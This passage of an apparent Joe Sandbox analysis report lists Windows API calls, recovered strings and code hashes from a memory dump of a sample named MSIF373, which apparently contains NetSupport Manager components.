                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: %s.%04d.%s$Client
                                                                                          • API String ID: 2111968516-3365126691
                                                                                          • Opcode ID: 8baae87390b79026482829060fb1fcab26cc6b3b7ceb626870fb6ce8b99af13e
                                                                                          • Instruction ID: ad67d760c53da6c44ace78b2caa9cd3f5e86203070e20f5b10b0eeb817693e06
                                                                                          • Opcode Fuzzy Hash: 8baae87390b79026482829060fb1fcab26cc6b3b7ceb626870fb6ce8b99af13e
                                                                                          • Instruction Fuzzy Hash: B20166B2601201BBEF205A189C4ABB77B6AFF41720F080125FD099B281E3B26C44C3F1
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 005CC78A
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005CC7C6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileLibraryLoadModuleName
                                                                                          • String ID: NSMTrace.dll
                                                                                          • API String ID: 1159719554-2572706706
                                                                                          • Opcode ID: 0b3a9a17b02c2782a4791be928f284a6c68d154f7d2789603bf89827349c927d
                                                                                          • Instruction ID: 260a212b2dcb441e2adcfd160ba5d795753efe544b1f2da9fee7c28366625e5b
                                                                                          • Opcode Fuzzy Hash: 0b3a9a17b02c2782a4791be928f284a6c68d154f7d2789603bf89827349c927d
                                                                                          • Instruction Fuzzy Hash: 9011E3B5A002169FCB24DFA5DC59EBA7FF9FB44314B00406EF909D7281EB309A018BE0
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 005AE4E5
                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 005AE511
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Value$Query
                                                                                          • String ID: %s=%x, e=%d
                                                                                          • API String ID: 4255345937-60135172
                                                                                          • Opcode ID: 69e0a09a3368a41dce7b00cc4421ed01eba9e7ef659d4a67dd2e69dafe5e972a
                                                                                          • Instruction ID: 48ba341ad14ac481f1179dce98443c4aedc3507759d49cf3f8c3279cfb812ac7
                                                                                          • Opcode Fuzzy Hash: 69e0a09a3368a41dce7b00cc4421ed01eba9e7ef659d4a67dd2e69dafe5e972a
                                                                                          • Instruction Fuzzy Hash: 9801B972E10118BBDB20EE94DC09FEF7B7CEB89714F00815AFD0497140E670A90587E1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wvsprintf
                                                                                          • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                          • API String ID: 2795597889-2052047905
                                                                                          • Opcode ID: 9b29ffa711d764c039482e35b71bd35fc95bdff316d6d191b9daaac95b6afe67
                                                                                          • Instruction ID: 73a473ad025797351b029909c82b4b4fa20386bfd6644fe2907d69bc3e24f8dd
                                                                                          • Opcode Fuzzy Hash: 9b29ffa711d764c039482e35b71bd35fc95bdff316d6d191b9daaac95b6afe67
                                                                                          • Instruction Fuzzy Hash: 67F08635A10108A7CB44EFA4DC158EEBBF9FF85700F048159F94697280EE70AE8887D5
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005A6047
                                                                                          • VerQueryValueW.VERSION(00000000,?,00000000,?), ref: 005A6062
                                                                                          Strings
                                                                                          • \StringFileInfo\%04x%04x\FileDescription, xrefs: 005A6041
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValuewsprintf
                                                                                          • String ID: \StringFileInfo\%04x%04x\FileDescription
                                                                                          • API String ID: 2072284396-3471089032
                                                                                          • Opcode ID: bb9ff61a9858ab100e4dcb2b0b8b517109e677adb24b09814079622ce122395f
                                                                                          • Instruction ID: f6b52bbd9199e41c823f66a2e70aa837046c4cc3b58f9197a106e352f59b4f60
                                                                                          • Opcode Fuzzy Hash: bb9ff61a9858ab100e4dcb2b0b8b517109e677adb24b09814079622ce122395f
                                                                                          • Instruction Fuzzy Hash: B201F2B590012D9ACB28DB50CC89BFEB3B8FF94304F0440DEE95A56142EA709A84CFA1
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00633318,00000008,005F2B66,00000000,00000000,?,005B97EE,00000000,?,?), ref: 005F2A6F
                                                                                            • Part of subcall function 005F92EA: EnterCriticalSection.KERNEL32(?,?,?,005F2AA8,0000000D,?,005B97EE,00000000,?,?), ref: 005F9314
                                                                                          • InterlockedIncrement.KERNEL32(00638D80), ref: 005F2AB0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterHandleIncrementInterlockedModuleSection
                                                                                          • String ID: KERNEL32.DLL
                                                                                          • API String ID: 2650740867-2576044830
                                                                                          • Opcode ID: 7e4f412ab6f6f0099a32e2d80b34d39a40f6745b3069da082dc49d3b363ac33e
                                                                                          • Instruction ID: 46ee2d1c47933f4f8bfd94d5edd8615d7fdc089eff197791425d6db58703637f
                                                                                          • Opcode Fuzzy Hash: 7e4f412ab6f6f0099a32e2d80b34d39a40f6745b3069da082dc49d3b363ac33e
                                                                                          • Instruction Fuzzy Hash: 7C01AD71400B05EBD720AF65D80A799BFE1FF80320F10890EE5D9973A1CBB8AA40CF65
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wvsprintf
                                                                                          • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0059A029
                                                                                          • wsprintfW.USER32 ref: 0059A048
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectorywsprintf
                                                                                          • String ID: \%s.inf
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,SetSecurityInfo), ref: 005BC454
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BC489
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: SetSecurityInfo
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,BuildExplicitAccessWithNameW), ref: 005BC364
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BC391
                                                                                          Strings
                                                                                          • BuildExplicitAccessWithNameW, xrefs: 005BC35E
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: BuildExplicitAccessWithNameW
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,ConvertStringSecurityDescriptorToSecurityDescriptorW), ref: 005AC014
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005AC03D
                                                                                          Strings
                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW, xrefs: 005AC00E
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorW
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,SetEntriesInAclW), ref: 005BC404
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BC42D
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: SetEntriesInAclW
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,CheckTokenMembership), ref: 005C2154
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005C2179
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: CheckTokenMembership
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(?,x)c,00000000,?,~6^,00632978,?,005E2ECB,00000000,?,005E367E,?), ref: 005E91E3
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID: x)c$~6^
                                                                                          APIs
                                                                                            • Part of subcall function 005BB080: GetCurrentThreadId.KERNEL32 ref: 005BB08E
                                                                                            • Part of subcall function 005BB080: EnterCriticalSection.KERNEL32(?,?,?,0063C2FC,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB098
                                                                                            • Part of subcall function 005BB080: LeaveCriticalSection.KERNEL32(?,?,00000000,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB0B8
                                                                                          • LoadStringW.USER32(00000000,?,00000454,00000200), ref: 005C221C
                                                                                          • wsprintfW.USER32 ref: 005C222D
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CurrentEnterLeaveLoadStringThreadwsprintf
                                                                                          • String ID: #%d
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,ConvertStringSidToSidW), ref: 005BC3B4
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BC3D5
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: ConvertStringSidToSidW
                                                                                          • API String ID: 199729137-806449257
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,IsWow64Process), ref: 005E29C4
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005E29E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: IsWow64Process
                                                                                          • API String ID: 199729137-777008139
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 005C20D4
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005C20F1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: GetDpiForWindow
                                                                                          • API String ID: 199729137-4136707520
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 005C2111
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005C2127
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastProc
                                                                                          • String ID: GetDpiForSystem
                                                                                          • API String ID: 199729137-3023621526
                                                                                          APIs
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 005B46C9
                                                                                          Strings
                                                                                          • m_hKey != NULL, xrefs: 005B46B5
                                                                                          • e:\nsmsrc\nsm\1410\1410\ctl32\RegKey.cpp, xrefs: 005B46B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete
                                                                                          • String ID: e:\nsmsrc\nsm\1410\1410\ctl32\RegKey.cpp$m_hKey != NULL
                                                                                          • API String ID: 1035893169-214662663
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: ipc %s@%u$no error
                                                                                          • API String ID: 2111968516-3872069982
                                                                                          APIs
                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,True,?), ref: 005D4270
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileStringWrite
                                                                                          • String ID: False$True
                                                                                          • API String ID: 390214022-1895882422